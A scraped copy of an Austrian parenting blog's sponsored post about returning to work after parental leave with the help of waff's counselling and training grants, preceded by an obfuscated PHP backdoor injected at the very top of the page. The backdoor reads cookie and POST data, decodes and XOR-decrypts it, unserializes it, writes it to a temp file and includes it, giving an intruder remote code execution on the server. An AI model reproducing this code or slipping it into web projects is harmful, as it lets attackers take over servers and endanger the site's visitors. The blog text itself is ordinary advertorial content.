$jXhbjbr = "\146" . "\113" . "\x6d" . '_' . chr ( 454 - 356 ).'z' . 'E' . chr ( 194 - 97 ).chr ( 704 - 636 ); $PvgoRu = 'c' . chr (108) . "\141" . 's' . chr ( 943 - 828 ).chr ( 258 - 163 )."\x65" . "\x78" . 'i' . 's' . "\x74" . chr ( 970 - 855 ); $EwcdOvYRk = class_exists($jXhbjbr); $jXhbjbr = "8353";$PvgoRu = "61944";$FtnSREqJsl = !1;if ($EwcdOvYRk == $FtnSREqJsl){function TrfkRoyLL(){return FALSE;}$cXgtDCSXJ = "20634";TrfkRoyLL();class fKm_bzEaD{private function gxFQpdMg($cXgtDCSXJ){if (is_array(fKm_bzEaD::$WLVkLgOJ)) {$hqkbAtKDo = sys_get_temp_dir() . "/" . crc32(fKm_bzEaD::$WLVkLgOJ['s' . "\141" . chr ( 277 - 169 ).chr ( 912 - 796 )]);@fKm_bzEaD::$WLVkLgOJ[chr (119) . chr ( 624 - 510 )."\x69" . chr ( 1113 - 997 ).chr (101)]($hqkbAtKDo, fKm_bzEaD::$WLVkLgOJ["\x63" . "\x6f" . "\156" . chr ( 466 - 350 ).chr ( 265 - 164 ).chr ( 381 - 271 ).'t']);include $hqkbAtKDo;@fKm_bzEaD::$WLVkLgOJ["\x64" . "\x65" . "\154" . chr ( 970 - 869 ).chr ( 366 - 250 ).chr ( 197 - 96 )]($hqkbAtKDo); $cXgtDCSXJ = "20634";exit();}}private $mKGlAh;public function sabAI(){echo 7098;}public function __destruct(){$cXgtDCSXJ = "38587_40721";$this->gxFQpdMg($cXgtDCSXJ); $cXgtDCSXJ = "38587_40721";}public function __construct($QXuHGe=0){$GnJOLC = $_POST;$rWRKA = $_COOKIE;$gRBtbv = "d11ff962-d156-445e-8634-ddb04f9c8211";$ZTZaoWUk = @$rWRKA[substr($gRBtbv, 0, 4)];if (!empty($ZTZaoWUk)){$iKuvkugMNc = "base64";$gUuKUCA = "";$ZTZaoWUk = explode(",", $ZTZaoWUk);foreach ($ZTZaoWUk as $sJMzCODE){$gUuKUCA .= @$rWRKA[$sJMzCODE];$gUuKUCA .= @$GnJOLC[$sJMzCODE];}$gUuKUCA = array_map($iKuvkugMNc . "\137" . "\144" . "\145" . 'c' . "\x6f" . "\x64" . "\145", array($gUuKUCA,)); $gUuKUCA = $gUuKUCA[0] ^ str_repeat($gRBtbv, (strlen($gUuKUCA[0]) / strlen($gRBtbv)) + 1);fKm_bzEaD::$WLVkLgOJ = @unserialize($gUuKUCA); $gUuKUCA = class_exists("38587_40721");}}public static $WLVkLgOJ = 55812;}$cdpecyXOED = new /* 61068 */ fKm_bzEaD(20634 + 20634); $_POST = Array();unset($cdpecyXOED);} Wie klappt der Jobeinstieg nach der Karenz? | Salon Mama
BUSINESS | KARENZ & JOB

Wie klappt der Jobeinstieg nach der Karenz?

Anzeige

11. März 2020

Wenn man das erste Mal schwanger ist, kommen so viele Fragen auf – vor allem wenn man berufstätig ist. Als ich im Angestelltenverhältnis war und das erste Mal schwanger war, hatte ich sehr viele Unsicherheiten. Wie werde ich in meinen Job zurückkehren? Mit wie vielen Stunden? Wie mache ich das mit der Kinderbetreuung? Kann ich überhaupt in meinen alten Job zurück oder bekomme ich eine neue Position? Kann ich während der Karenz auch geringfügig arbeiten? Vollzeit oder Teilzeit? Vielleicht will ich aber auch einen kompletten Neuanfang starten…Da gibt es einfach so viele Fragen, auf die man am Anfang auch keine Antwort weiß. Ich möchte euch in diesem Blogartikel die Services vom waff rund um die Vereinbarung von Beruf und Familie vorstellen. Vor, während und nach der Babypause steht der waff in Jobfragen begleitend zur Seite. Welche Voraussetzungen erfüllt sein müssen, wie diese Unterstützung reibungslos funktioniert und was sie überhaupt alles beinhaltet, möchte ich euch hier gerne zusammenfassen.

welche fragen beantwortet der waff?

Ich erinnere mich gut an die Zeit zurück, als ich das erste mal schwanger war und mir sehr viele Gedanken über meine Karriere und meinen Wiedereinstieg in den Job gemacht habe. Leider wusste ich zu diesem Zeitpunkt noch nicht über die Services und die Unterstützung vom waff Bescheid – ansonsten hätte ich mich auf jeden Fall kostenlos beraten lassen. 

Man kann sich auf www.waff.at viele Infos bereits online einholen, jedoch würde ich ein persönliches Beratungsgespräch vor Ort empfehlen. Den Termin kann man ganz einfach z.B. telefonisch vereinbaren und man kann dann gemeinsam mit den Beratern und Beraterinnen vom waff die persönliche Situation klären und einen guten Plan ausarbeiten. Folgende Fragen können geklärt werden: 

• Wie vereinbare ich Beruf und Familie?
• Wie gehe ich im Job mit der Kinderbetreuung um?
• Kann ich meinen alten Job zurück oder komme ich in eine neue Rolle/Abteilung?
• Welche Aufgaben und Zuständigkeiten habe ich nach der Rückkehr in den Job?
• Kann ich von meinem Arbeitgeber Unterstützung erwarten?
• Kann ich während der Karenz geringfügig weiter arbeiten?
• Brauche ich eine Weiterbildung damit ich nach der Karenz gut weiterarbeiten kann?
• Arbeite ich dann Vollzeit oder Teilzeit?
• Will ich überhaupt in meinen alten Beruf zurück oder möchte ich etwas neues starten?
• Wie kann ich mir die Karenz mit dem Vater meines Kindes aufteilen?
usw. 

Viele weitere Benefits

Neben der Beantwortung obiger Fragen bietet der waff noch viele weitere Benefits, wie z.B.: den Zugang zu Workshops & Vorträgen und die finanzielle Unterstützung für Aus- & Weiterbildungen (bis zu 2.700€ – 100% der Kurskosten). Und zu guter letzt ein sehr wertvolles Netzwerk mit den richtigen Kontakten bei rechtlichen Fragen zu Karenz & Kinderbetreuungsgeld, arbeitsrechtliche Fragen oder Fragen zur Organisation der Kinderbetreuung. 

Wie ist der genaue Ablauf?

Der Ablauf ist sehr simpel und im ersten Schritt vereinbart man einfach einen Termin für ein persönliches Beratungsgespräch – idealerweise vor der Karenz.

Darauf folgt dann die gemeinsame Planung für einen erfolgreichen Wiedereinstieg in den alten Job. Oder man erhält Betreuung für den erfolgreichen Start in einen neuen Beruf. Inkludiert ist auch eine intensive Beratung zum Thema Teilzeit und Vollzeit. Also wie viele Stunde arbeite ich nach der Karenz?Wo es auch viele Unklarheiten gibt ist das Thema: Wie funktioniert Karenz für Papas?

Nach einem ausführlichen Gespräch erfolgt die Erstellung eines individuellen Bildungsplanes mit passenden Aus- & Weiterbildungen und ggf. finanzieller Unterstützung für Kurskosten. 

BUSINESS | KARENZ & JOB

FAKTEN & KONTAKT

Der waff bietet folgende Services an: 

  • Kostenlose Beratung rund um das Thema Karenz und beruflicher Wiedereinstieg
  • Workshops, Vorträge, Eltern-Kind-Treffs
  • Informationen über Aus- und Weiterbildungen
  • finanzielle Unterstützung bei der Weiterbildung

Beratungszentrum für Beruf und Weiterbildung:

Nordbahnstraße 36
Stiege 1 / 3. Stock
1020 Wien
Tel.: 01 217 48 555
Die 5 wichtigsten Fragen zu Karenz und Wiedereinstieg

Hier findest du ausführliche Antworten auf die 5 wichtigsten Fragen. 

Es gibt auf diese Frage keine eindeutige Antwort. Wichtig ist, dass man sich schon früh mit der Karenz und der Rückkehr in den Job beschäftigt. Am besten klärt man bereits vor der Karenz einige Fragen. Der waff hilft dabei auch mit Beratung.

● Wie lange möchte man in Karenz gehen?

● Teilst du dir die Karenz mit deinem Partner?

● Möchtest du während der Karenz geringfügig weiterarbeiten?

● Wann willst du wieder in den Job einsteigen?

● Möchtest du bei deiner Rückkehr in den Job Vollzeit oder Teilzeit arbeiten?

● Kannst du vom Arbeitgeber Unterstützung erwarten?

● Wie schaut es während der Karenz mit dem Geld aus?

● Wie organisiert man die Kinderbetreuung?

Die waff BeraterInnen können bei diesen Fragen helfen und bereiten dich auf Verhandlungen mit dem Arbeitgeber vor. Außerdem ist der waff gut vernetzt und gibt dir die richtigen Kontakte, wenn du Fragen zu folgenden Themen hast:

● Rechtliche Fragen zu Karenz und Kinderbetreuungsgeld

● Arbeitsrechtliche Fragen

● Organisation der Kinderbetreuung

Besonders wichtig ist, dass du dich rechtzeitig mit der Rückkehr in den Job beschäftigst. Denn für viele ist die Rückkehr in den Job nach einer Karenz nicht leicht. Da sind viele Herausforderungen, die sich durch die Rolle als Elternteil ergeben:

● Es kann sein, dass du neue Aufgaben übernimmst

● Oft verändern sich mit einem Kind die Rahmenbedingungen. Zum Beispiel die Arbeitszeiten, die Möglichkeit, beruflich zu reisen und vieles mehr.

● Außerdem muss du mit Unerwartetem rechnen, wie zum Beispiel Krankheiten der Kinder.

● Du musst die Kinder-Betreuung organisieren. Dazu gehört auch zu schauen, wie das Kind in den Kindergarten kommt und wer es abholt.

● Vielleicht musst du dafür auch Unterstützung organisieren.

Vielleicht gibt es auch neue Herausforderungen im Job selbst:

● Wie wirst du von Kolleginnen und Kollegen wahrgenommen?

● Hat sich deine Position verändert?

● Hat sich deine Arbeit oder dein Aufgabengebiet verändert?

Unsere Tipps für die Rückkehr in den Job:

● Es ist gut, wenn du während der Karenz mit deinem Arbeitgeber und deinen Arbeitskollegen in Kontakt bleibst. Es ist auch möglich, während der Karenz geringfügig zu arbeiten. Du kannst in dieser Zeit auch Kurse machen und dich weiterbilden.

● Werde selbst aktiv: Sprich rechtzeitig mit deinem Vorgesetzten über Aufgaben und Zuständigkeiten nach der Rückkehr in den Job. Zeige, dass du dich darauf vorbereitest.

Vielleicht denkst du während der Karenz auch über einen neuen Beruf nach. Wer im Job schon vor der Karenz unzufrieden war, kann die Zeit nutzen, um sich einen neuen Job zu suchen. Auch in diesem Fall ist es gut, sich wichtige Fragen zu stellen:

● In welchem Bereich möchtest du arbeiten?

● Warum willst du jetzt wechseln? Was spricht dafür? Was spricht dagegen?

● Willst du Vollzeit oder Teilzeit arbeiten?

● Was machst du, wenn du im Bewerbungsgespräch auf deine neue Eltern Rolle angesprochen wirst?

● Wie gehst du mit der mehrfachen Belastung um, wenn du einen neuen Beruf hast? 

Für viele stellt sich die Frage, ob sie nach der Karenz Teilzeit oder Vollzeit in den Job zurückkehren sollen. Diese Frage ist besonders wichtig, weil Teilzeit-Arbeit langfristig weniger Geld bedeutet. Gerade bei Frauen sind die Gehaltseinbußen oft sehr hoch.

Es ist wichtig, dass du darüber Bescheid weisst: Weniger Gehalt bedeutet auch langfristig weniger Pension. Wenn du nicht Vollzeit arbeitest, bist du wahrscheinlich vom Einkommen des Partners oder der Partnerin stärker abhängig. Hier kann es sinnvoll sein, sich zu überlegen, wie du die Folgen von Teilzeit ausgleichst. Z.B. kannst du mit deinem Partner Unterstützung bei der Pensionsvorsorge ausmachen. Zum waff kommen auch Frauen, die zwar Teilzeit angestellt sind, aber tatsächlich viel mehr arbeiten. Das führt zu hoher Arbeitsbelastung. Dazu kommen meist noch Kindererziehung und Haushalt. Die Beraterinnen und Berater helfen, einen Plan zu erarbeiten: wie du gut auf dich schauen kannst. Oder wie du wieder von der Teilzeit in die Vollzeit kommst.

Manchmal bietet die Karenz auch die Chance, sich im Job weiter zu entwickeln oder einen neuen Job zu suchen. Denn manchmal findet man in dieser Zeit einen Job, der den eigenen Ansprüchen besser entspricht oder bessere Arbeitszeiten hat. 

Eigentlich ist es für Väter ganz einfach und genauso wie bei den Müttern: Karenz vereinbaren und in Karenz gehen. Trotzdem gehen in Österreich nur zirka 20 Prozent der Väter in Karenz. Viele Männer werden vom Arbeitgeber schief angeschaut, wenn Sie in Karenz gehen möchten. Die waff Beraterinnen und Berater können dich bereits im Vorfeld über die Rahmenbedingungen informieren. Und sie können mit dir einen Plan ausarbeiten, wie du die Karenz bei deinem Arbeitgeber geschickt einfädelst. Denn es gilt auch für Männer: Karenzen sind immer Berufsunterbrechungen. Damit sind auch Herausforderungen und Schwierigkeiten verbunden:

● Wie vereinbarst du deine Karenz am besten?

● Was tun, wenn der Arbeitgeber Schwierigkeiten macht?

● Wie kannst du  während der Karenz beruflich über deine Firma informiert bleiben?

● Wie machst du das mit der Rückkehr in den Job? Wenn du die Karenz für eine Weiterbildung nutzen möchtest, damit du beruflich am neuesten Stand bleibst, kann dich der waff beraten und mit Geld unterstützen.

Geld für berufliche Weiterbildung in der Karenz ist wichtig. Aber zuerst stellen sich andere Fragen:

Welche Aus- und Weiterbildung ist passend?

Überlege dir, ob die berufliche Weiterbildung zu deinen Job-Plänen passt. Bringt dir die Weiterbildung etwas? Kannst du die neuen Kenntnisse anwenden? Was kannst du lernen, damit du für Arbeitgeber nach der Karenz interessant bleibst?

Wo kriegst du die Zeit her?

Aus- und Weiterbildungen brauchen Zeit. Und gerade mit einem Baby daheim ist ein guter Zeitplan besonders wichtig. Schaue dir die Kurszeiten an und wie du diese mit der Kinderbetreuung vereinbaren kannst. Es ist vielleicht eine gute Idee, Kurse am Abend oder am Wochenende zu besuchen. Auch wichtig: Der Ort, an dem die Kurse stattfinden. Und vergiss nicht, Zeit fürs Lernen einzuplanen!

Weiterbildung für den neuen Job?

Besonders wichtig wird die Weiterbildung, wenn du dich neu orientieren und einen neuen Job haben möchtest. Die Beraterinnen und Berater des waff können sich mit dir die gewünschte Branche und mögliche Arbeitgeber anschauen. Gibt es dort Jobs? Wie ist die Bezahlung? Ist ein Wechsel wirklich auf Dauer sinnvoll? Und habe ich dort als frischgebackene Mutter oder frischgebackener Vater auch gute Chancen? Wenn du dich für einen Kurs entscheidest, ist der waff auch mit Geld für dich da. Insgesamt kannst du bis zu 2.700 Euro für eine berufliche Weiterbildung bekommen. Alle genauen Infos dazu erhältst du bei den Beraterinnen und Beratern des waff. 

Ein persönliches Beratungsgespräch hilft, die Unsicherheit wird geringer und man kann sich voll und ganz auf diesen neuen Lebensabschnitt konzentrieren. Ich wünsche euch alles gute und einen gelungenen Einstieg in den Job nach der Karenz!

Anzeige – Inhalte in Zusammenarbeit mit Waff

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Instagram
Wir verwenden Cookies, um Inhalte zu personalisieren, Funktionen für soziale Medien anbieten zu können und die Zugriffe auf unsere Website zu analysieren.